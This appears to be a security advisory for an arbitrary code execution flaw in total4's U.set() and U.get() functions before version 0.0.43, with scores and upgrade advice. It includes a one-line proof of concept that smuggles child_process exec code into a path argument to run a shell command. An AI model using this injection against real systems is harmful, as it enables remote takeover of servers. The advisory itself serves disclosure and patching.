Arbitrary Code Execution Affecting total4 package, versions <0.0.43


Severity

0.0
critical
0
10

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.58% (79th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-TOTAL4-1130527
  • published 7 Jul 2021
  • disclosed 24 Mar 2021
  • credit Alessio Della Libera (@d3lla)

How to fix?

Upgrade total4 to version 0.0.43 or higher.

Overview

total4 is a framework for Node.js platform written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as a web, desktop, service, or IoT application.

Affected versions of this package are vulnerable to Arbitrary Code Execution via the U.set() and U.get() functions.

PoC by Alessio Della Libera

const total = require('total4');
U.set({}, 'a;let {mainModule}=process; let {require}=mainModule; let {exec}=require("child_process"); exec("touch HACKED")//');

CVSS Scores

version 3.1
Expand this section

Snyk

9.8 critical
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High
Expand this section

NVD

9.8 critical